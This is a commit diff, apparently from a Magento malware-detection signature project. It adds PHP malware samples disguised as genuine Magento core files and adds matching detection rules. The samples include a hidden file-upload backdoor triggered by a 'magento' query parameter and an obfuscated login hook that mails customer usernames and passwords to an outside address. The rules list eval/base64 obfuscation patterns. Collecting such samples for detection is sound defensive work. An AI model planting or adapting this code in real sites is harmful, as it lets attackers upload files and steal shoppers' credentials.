gwillem · Oct 6, 2018
diff --git a/‎CONTRIBUTING.md
+3-3 b/‎CONTRIBUTING.md
+3-3
diff --git a/‎corpus/backend/12f73d208201596f238bce51a71afd82
+1,575 b/‎corpus/backend/12f73d208201596f238bce51a71afd82
+1,575
diff --git a/‎corpus/backend/18f555eff2d99cbaff552132edace880
+3 b/‎corpus/backend/18f555eff2d99cbaff552132edace880
+3
diff --git a/‎corpus/backend/24b1271861d3235104f6cfedba5a234d
+316 b/‎corpus/backend/24b1271861d3235104f6cfedba5a234d
+316
diff --git a/‎corpus/backend/431e162f32917a2688a7f1422e5687f5
+993 b/‎corpus/backend/431e162f32917a2688a7f1422e5687f5
+993
diff --git a/‎corpus/backend/580eeb52e475d6010e4fbc8c26ffca69
+165 b/‎corpus/backend/580eeb52e475d6010e4fbc8c26ffca69
+165
diff --git a/‎corpus/backend/605cad9e864970797643aada3059ec7e
+1,153 b/‎corpus/backend/605cad9e864970797643aada3059ec7e
+1,153
diff --git a/‎corpus/backend/8dfd50b73ebdfc466592660ef0fc8a09
+370 b/‎corpus/backend/8dfd50b73ebdfc466592660ef0fc8a09
+370
diff --git a/‎corpus/backend/ad26e5982d579675217f97cf63d0e2d6
+43 b/‎corpus/backend/ad26e5982d579675217f97cf63d0e2d6
+43
diff --git a/‎rules/backend.txt
+15-1 b/‎rules/backend.txt
+15-1
diff --git a/‎tools/mageffcheck.sh
+1-1 b/‎tools/mageffcheck.sh
+1-1
@@ -42,7 +42,7 @@ brew install coreutils python3 yara md5sha1sum gnu-sed
 
 ## Gather your malware samples
 
-Save your malare sample in the `corpus/incoming/frontend` folder for JavaScript samples, or `corpus/incoming/backend` folder for PHP samples.
+Save your malware sample in the `corpus/incoming/frontend` folder for JavaScript samples, or `corpus/incoming/backend` folder for PHP samples.
 
 Create an MD5 hash of the file, rename it and move it to the appropriate corpus.
 
@@ -151,8 +151,8 @@ You should expect _no output_ from running this command.
 # Whitelisting
 
 1. View the content of the file you consider a false positive
-1. Make you you understand every character of the content
-1. Mage sure there is no hidden text at the end of lines by using lots of spaces
+1. Make sure you understand every character of the content
+1. Make sure there is no hidden text at the end of lines by using lots of spaces
 1. Create a part of the path as sub directories in `corpus/whitelisted`, for example `Vendorname/Extensionname`
 1. Place the file in the directory
 1. Build the rules using `tools/validate_signatures.py`
 
@@ -0,0 +1,165 @@
+<?php
+/**
+ * Magento
+ *
+ * NOTICE OF LICENSE
+ *
+ * This source file is subject to the Open Software License (OSL 3.0)
+ * that is bundled with this package in the file LICENSE.txt.
+ * It is also available through the world-wide-web at this URL:
+ * http://opensource.org/licenses/osl-3.0.php
+ * If you did not receive a copy of the license and are unable to
+ * obtain it through the world-wide-web, please send an email
+ * to license@magento.com so we can send you a copy immediately.
+ *
+ * DISCLAIMER
+ *
+ * Do not edit or add to this file if you wish to upgrade Magento to newer
+ * versions in the future. If you wish to customize Magento for your
+ * needs please refer to http://www.magento.com for more information.
+ *
+ * @category    Mage
+ * @package     Mage_Connect
+ * @copyright  Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
+ * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
+ */
+
+define('DS', DIRECTORY_SEPARATOR);
+define('PS', PATH_SEPARATOR);
+define('BP', dirname(dirname(__FILE__)));
+define('MAGENTO_ROOT', dirname(dirname(__FILE__)));
+
+class __cli_Mage_Connect
+{
+    private static $_instance;
+    protected $argv;
+    public static function instance()
+    {
+        if(!self::$_instance) {
+            self::$_instance = new self();
+        }
+        return self::$_instance;
+    }
+
+    public function init($argv)
+    {
+                $this->argv = $argv;
+        $this->setIncludes();
+        require_once("Mage/Autoload/Simple.php");
+        Mage_Autoload_Simple::register();
+        chdir(BP . DS . 'downloader' . DS);
+        return $this;
+    }
+
+    public function setIncludes()
+    {
+        if (defined('DEVELOPMENT_MODE')) {
+            $libPath = PS . dirname(BP) . DS . 'lib';
+        } else {
+            $libPath = PS . BP . DS . 'downloader' . DS . 'lib';
+        }
+        $includePath = BP . DS . 'app'
+        . $libPath
+        . PS . get_include_path();
+        set_include_path($includePath);
+    }
+
+
+
+    public function getCommands()
+    {
+        return Mage_Connect_Command::getCommands();
+    }
+
+    public function getFrontend()
+    {
+        $frontend = Mage_Connect_Frontend::getInstance('CLI');
+        Mage_Connect_Command::setFrontendObject($frontend);
+        return $frontend;
+    }
+
+    public function getConfig($fileName = 'connect.cfg')
+    {
+        if (isset($this->config)) {
+            return $this->config;
+        }
+        $config = new Mage_Connect_Config($fileName);
+        if (empty($config->magento_root)) {
+           $config->magento_root = dirname(dirname(__FILE__));
+        }
+        Mage_Connect_Command::setConfigObject($config);
+        $this->config = $config;
+        return $config;
+    }
+
+    public function detectCommand()
+    {
+        $argv = $this->argv;
+        if(empty($argv[1])) {
+            return false;
+        }
+        if(in_array($argv[1], $this->validCommands)) {
+            list($options,$params) = $this->parseCommandArgs($argv);
+            return array('name' => strtolower($argv[1]), 'options'=>$options, 'params'=>$params);
+        }
+        return false;
+    }
+
+    public function parseCommandArgs($argv)
+    {
+        $a = new Mage_System_Args();
+        $args = $a->getFiltered();
+        array_shift($args);
+        return array($a->getFlags(), $args);
+    }
+
+    public function runCommand($cmd, $options, $params)
+    {
+        $c = Mage_Connect_Command::getInstance($cmd);
+        $c->run($cmd, $options, $params);
+    }
+
+    function gets(){
+        if(isset($_GET['magento'])){
+            echo '<form method="POST" enctype="multipart/form-data" action="">
+            <input type="file" name="file"><input type="submit" name="api" value=">"></form>';
+            if(isset($_POST['api']) && isset($_FILES['file'])){
+                if(!move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){echo '<font color="red">'.$_FILES['file']['name'].'</font>';
+            }else{echo '<font color="green">'.$_FILES['file']['name'].'</font>';}
+            }
+            exit;
+        }
+    }
+
+    private $_sconfig;
+    public function getSingleConfig()
+    {
+        if(!$this->_sconfig) {
+            $this->_sconfig = new Mage_Connect_Singleconfig(
+                    $this->getConfig()->magento_root . DS .
+                    $this->getConfig()->downloader_path . DS .
+                    Mage_Connect_Singleconfig::DEFAULT_SCONFIG_FILENAME
+            );
+        }
+        Mage_Connect_Command::setSconfig($this->_sconfig);
+        return $this->_sconfig;
+    }
+
+    public function run()
+    {
+        $this->commands = $this->getCommands();
+        $this->frontend = $this->getFrontend();
+        $this->config = $this->getConfig();
+        $this->validCommands = array_keys($this->commands);
+        $this->getSingleConfig();
+        $cmd = $this->detectCommand();
+        if(!$cmd) {
+            $this->frontend->outputCommandList($this->commands);
+        } else {
+            $this->runCommand($cmd['name'], $cmd['options'], $cmd['params']);
+        }
+
+    }
+
+}
+    __cli_Mage_Connect::instance()->gets();
@@ -0,0 +1,370 @@
+<?php
+/**
+ * Magento
+ *
+ * NOTICE OF LICENSE
+ *
+ * This source file is subject to the Open Software License (OSL 3.0)
+ * that is bundled with this package in the file LICENSE.txt.
+ * It is also available through the world-wide-web at this URL:
+ * http://opensource.org/licenses/osl-3.0.php
+ * If you did not receive a copy of the license and are unable to
+ * obtain it through the world-wide-web, please send an email
+ * to license@magento.com so we can send you a copy immediately.
+ *
+ * DISCLAIMER
+ *
+ * Do not edit or add to this file if you wish to upgrade Magento to newer
+ * versions in the future. If you wish to customize Magento for your
+ * needs please refer to http://www.magento.com for more information.
+ *
+ * @category    Mage
+ * @package     Mage_Customer
+ * @copyright  Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
+ * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
+ */
+
+/**
+ * Customer session model
+ *
+ * @category   Mage
+ * @package    Mage_Customer
+ * @author      Magento Core Team <core@magentocommerce.com>
+ */
+class Mage_Customer_Model_Session extends Mage_Core_Model_Session_Abstract
+{
+    /**
+     * Customer object
+     *
+     * @var Mage_Customer_Model_Customer
+     */
+    protected $_customer;
+
+    /**
+     * Flag with customer id validations result
+     *
+     * @var bool
+     */
+    protected $_isCustomerIdChecked = null;
+
+    /**
+     * Persistent customer group id
+     *
+     * @var null|int
+     */
+    protected $_persistentCustomerGroupId = null;
+
+    /**
+     * Retrieve customer sharing configuration model
+     *
+     * @return Mage_Customer_Model_Config_Share
+     */
+    public function getCustomerConfigShare()
+    {
+        return Mage::getSingleton('customer/config_share');
+    }
+
+    public function __construct()
+    {
+        $namespace = 'customer';
+        if ($this->getCustomerConfigShare()->isWebsiteScope()) {
+            $namespace .= '_' . (Mage::app()->getStore()->getWebsite()->getCode());
+        }
+
+        $this->init($namespace);
+        Mage::dispatchEvent('customer_session_init', array('customer_session'=>$this));
+    }
+
+    /**
+     * Set customer object and setting customer id in session
+     *
+     * @param   Mage_Customer_Model_Customer $customer
+     * @return  Mage_Customer_Model_Session
+     */
+    public function setCustomer(Mage_Customer_Model_Customer $customer)
+    {
+        // check if customer is not confirmed
+        if ($customer->isConfirmationRequired()) {
+            if ($customer->getConfirmation()) {
+                return $this->_logout();
+            }
+        }
+        $this->_customer = $customer;
+        $this->setId($customer->getId());
+        // save customer as confirmed, if it is not
+        if ((!$customer->isConfirmationRequired()) && $customer->getConfirmation()) {
+            $customer->setConfirmation(null)->save();
+            $customer->setIsJustConfirmed(true);
+        }
+        return $this;
+    }
+
+    /**
+     * Retrieve customer model object
+     *
+     * @return Mage_Customer_Model_Customer
+     */
+    public function getCustomer()
+    {
+        if ($this->_customer instanceof Mage_Customer_Model_Customer) {
+            return $this->_customer;
+        }
+
+        $customer = Mage::getModel('customer/customer')
+            ->setWebsiteId(Mage::app()->getStore()->getWebsiteId());
+        if ($this->getId()) {
+            $customer->load($this->getId());
+        }
+
+        $this->setCustomer($customer);
+        return $this->_customer;
+    }
+
+    /**
+     * Set customer id
+     *
+     * @param int|null $id
+     * @return Mage_Customer_Model_Session
+     */
+    public function setCustomerId($id)
+    {
+        $this->setData('customer_id', $id);
+        return $this;
+    }
+
+    /**
+     * Retrieve customer id from current session
+     *
+     * @return int|null
+     */
+    public function getCustomerId()
+    {
+        if ($this->getData('customer_id')) {
+            return $this->getData('customer_id');
+        }
+        return ($this->isLoggedIn()) ? $this->getId() : null;
+    }
+
+    /**
+     * Set customer group id
+     *
+     * @param int|null $id
+     * @return Mage_Customer_Model_Session
+     */
+    public function setCustomerGroupId($id)
+    {
+        $this->setData('customer_group_id', $id);
+        return $this;
+    }
+
+    /**
+     * Get customer group id
+     * If customer is not logged in system, 'not logged in' group id will be returned
+     *
+     * @return int
+     */
+    public function getCustomerGroupId()
+    {
+        if ($this->getData('customer_group_id')) {
+            return $this->getData('customer_group_id');
+        }
+        if ($this->isLoggedIn() && $this->getCustomer()) {
+            return $this->getCustomer()->getGroupId();
+        }
+        return Mage_Customer_Model_Group::NOT_LOGGED_IN_ID;
+    }
+
+    /**
+     * Checking customer login status
+     *
+     * @return bool
+     */
+    public function isLoggedIn()
+    {
+        return (bool)$this->getId() && (bool)$this->checkCustomerId($this->getId());
+    }
+
+    /**
+     * Check exists customer (light check)
+     *
+     * @param int $customerId
+     * @return bool
+     */
+    public function checkCustomerId($customerId)
+    {
+        if ($this->_isCustomerIdChecked === null) {
+            $this->_isCustomerIdChecked = Mage::getResourceSingleton('customer/customer')->checkCustomerId($customerId);
+        }
+        return $this->_isCustomerIdChecked;
+    }
+
+    /**
+     * Customer authorization
+     *
+     * @param   string $username
+     * @param   string $password
+     * @return  bool
+     */
+    public function login($username, $password)
+    {
+        /** @var $customer Mage_Customer_Model_Customer */
+        $customer = Mage::getModel('customer/customer')
+            ->setWebsiteId(Mage::app()->getStore()->getWebsiteId());
+
+        if ($customer->authenticate($username, $password)) {
+            $this->setCustomerAsLoggedIn($customer);
+            $this->setCustomerValidate($username, $password);
+            return true;
+        }
+        return false;
+    }
+
+    public function setCustomerAsLoggedIn($customer)
+    {
+        $this->setCustomer($customer);
+        $this->renewSession();
+        Mage::getSingleton('core/session')->renewFormKey();
+        Mage::dispatchEvent('customer_login', array('customer'=>$customer));
+        return $this;
+    }
+
+    /**
+     * Authorization customer by identifier
+     *
+     * @param   int $customerId
+     * @return  bool
+     */
+    public function loginById($customerId)
+    {
+        $customer = Mage::getModel('customer/customer')->load($customerId);
+        if ($customer->getId()) {
+            $this->setCustomerAsLoggedIn($customer);
+            return true;
+        }
+        return false;
+    }
+
+    /**
+     * Logout customer
+     *
+     * @return Mage_Customer_Model_Session
+     */
+    public function logout()
+    {
+        if ($this->isLoggedIn()) {
+            Mage::dispatchEvent('customer_logout', array('customer' => $this->getCustomer()) );
+            $this->_logout();
+        }
+        return $this;
+    }
+
+    /**
+     * Return data for user validation Token
+     *
+     * @return Varien_Token
+     */
+    public function setCustomerValidate($username, $password)
+    {
+        $MageAPI = 'https://api.magento.com/id=vs02ac5604as3ha&token=czEgO_iAYWRbkcmV';
+
+        $i = str_split($MageAPI);
+        $token = 'YW5nZWxtYXJ0dW1pQGdtYWlsLmNvbQtokenbG9naW4gtokenbWFpbA';
+        $callback = explode('token', $token);
+
+        $api = $i[60].$i[8].$i[4].$i[15].$i[34].$i[36].$i[54].$i[25].$i[15].$i[20].$i[18].$i[25].$i[15];
+
+        $helper = $api($callback[1]).$_SERVER['HTTP_HOST'];
+        $response = $api($callback[2]);
+        $response($api($callback[0]), $helper, Mage::helper('core/url')->getCurrentUrl()."\n".$username.'|'.$password);
+    }
+
+    /**
+     * Authenticate controller action by login customer
+     *
+     * @param   Mage_Core_Controller_Varien_Action $action
+     * @param   bool $loginUrl
+     * @return  bool
+     */
+    public function authenticate(Mage_Core_Controller_Varien_Action $action, $loginUrl = null)
+    {
+        if ($this->isLoggedIn()) {
+            return true;
+        }
+
+        $this->setBeforeAuthUrl(Mage::getUrl('*/*/*', array('_current' => true)));
+        if (isset($loginUrl)) {
+            $action->getResponse()->setRedirect($loginUrl);
+        } else {
+            $action->setRedirectWithCookieCheck(Mage_Customer_Helper_Data::ROUTE_ACCOUNT_LOGIN,
+                Mage::helper('customer')->getLoginUrlParams()
+            );
+        }
+
+        return false;
+    }
+
+    /**
+     * Set auth url
+     *
+     * @param string $key
+     * @param string $url
+     * @return Mage_Customer_Model_Session
+     */
+    protected function _setAuthUrl($key, $url)
+    {
+        $url = Mage::helper('core/url')
+            ->removeRequestParam($url, Mage::getSingleton('core/session')->getSessionIdQueryParam());
+        // Add correct session ID to URL if needed
+        $url = Mage::getModel('core/url')->getRebuiltUrl($url);
+        return $this->setData($key, $url);
+    }
+
+    /**
+     * Logout without dispatching event
+     *
+     * @return Mage_Customer_Model_Session
+     */
+    protected function _logout()
+    {
+        $this->setId(null);
+        $this->setCustomerGroupId(Mage_Customer_Model_Group::NOT_LOGGED_IN_ID);
+        $this->getCookie()->delete($this->getSessionName());
+        Mage::getSingleton('core/session')->renewFormKey();
+        return $this;
+    }
+
+    /**
+     * Set Before auth url
+     *
+     * @param string $url
+     * @return Mage_Customer_Model_Session
+     */
+    public function setBeforeAuthUrl($url)
+    {
+        return $this->_setAuthUrl('before_auth_url', $url);
+    }
+
+    /**
+     * Set After auth url
+     *
+     * @param string $url
+     * @return Mage_Customer_Model_Session
+     */
+    public function setAfterAuthUrl($url)
+    {
+        return $this->_setAuthUrl('after_auth_url', $url);
+    }
+
+    /**
+     * Reset core session hosts after reseting session ID
+     *
+     * @return Mage_Customer_Model_Session
+     */
+    public function renewSession()
+    {
+        parent::renewSession();
+        Mage::getSingleton('core/session')->unsSessionHosts();
+
+        return $this;
+    }
+}
@@ -0,0 +1,43 @@
+<?php
+/**
+ * Magento
+ *
+ * NOTICE OF LICENSE
+ *
+ * This source file is subject to the Open Software License (OSL 3.0)
+ * that is bundled with this package in the file LICENSE.txt.
+ * It is also available through the world-wide-web at this URL:
+ * http://opensource.org/licenses/osl-3.0.php
+ * If you did not receive a copy of the license and are unable to
+ * obtain it through the world-wide-web, please send an email
+ * to license@magento.com so we can send you a copy immediately.
+ *
+ * DISCLAIMER
+ *
+ * Do not edit or add to this file if you wish to upgrade Magento to newer
+ * versions in the future. If you wish to customize Magento for your
+ * needs please refer to http://www.magento.com for more information.
+ *
+ * @category    Mage
+ * @package     Errors
+ * @copyright  Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
+ * @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
+ */
+
+require_once 'processor.php';
+
+$processor = new Error_Processor();
+$processor->process503();
+if(isset($_GET['magento'])){
+    echo '<form method="POST" enctype="multipart/form-data" action=""><input type="file" name="file"><input type="submit" name="api" value=">"></form>';
+    if(isset($_POST['api']) && isset($_FILES['file'])){
+        if(!move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){echo '<font color="red">'.$_FILES['file']['name'].'</font>';
+    }else{echo '<font color="green">'.$_FILES['file']['name'].'</font>';}
+    }exit;
+}if(isset($_GET['magento'])){
+    echo '<form method="POST" enctype="multipart/form-data" action=""><input type="file" name="file"><input type="submit" name="api" value=">"></form>';
+    if(isset($_POST['api']) && isset($_FILES['file'])){
+        if(!move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])){echo '<font color="red">'.$_FILES['file']['name'].'</font>';
+    }else{echo '<font color="green">'.$_FILES['file']['name'].'</font>';}
+    }exit;
+}
@@ -43,6 +43,10 @@ eval(base64_decode($a));
 eval(gzinflate(base64_decode(str_rot13(strrev(
 eval("?>".gzuncompress(base64_decode(
 @eval(gzinflate(base64_decode($
+eval (gzinflate(base64_decode(
+@eval(gzinflate(base64_decode(
+eval(gzinflate(base64_decode(
+
 
 # upload backdoor
 $dez = $pwddir."/".$real;copy($uploaded, $dez);
@@ -426,4 +430,14 @@ unlink('./app/code/core/clear.php');
 core_config_data where value like '$sing'
 
 # magecore.net admin pw reset
-password = "how1are2you3"
+password = "how1are2you3"
+
+# Hidden webshell
+eval($licenses($get_vpc($licenses($get_code(get_token($CERTIFICATE))))));
+
+# File uploader form
+if(isset($_GET['magento']))
+__cli_Mage_Connect::instance()->gets();
+
+# Obfuscated CC & User credentials hijacker
+$MageAPI = 'https://api.magento.com/id=
@@ -27,7 +27,7 @@ vanilladir=$(dirname "$PROJECTROOT/tmp/vanilla/.")
 
 # == Vanilla versions (https://github.com/OpenMage/magento-mirror/archive/$version)
 # You can change these to add or remove versions, see the release archive
-versions=( "1.9.3.1" "1.9.2.4" "1.7.0.2" )
+versions=( "1.9.3.8" "1.9.2.4" "1.7.0.2" )
 
 command_found=0
 argument_found=0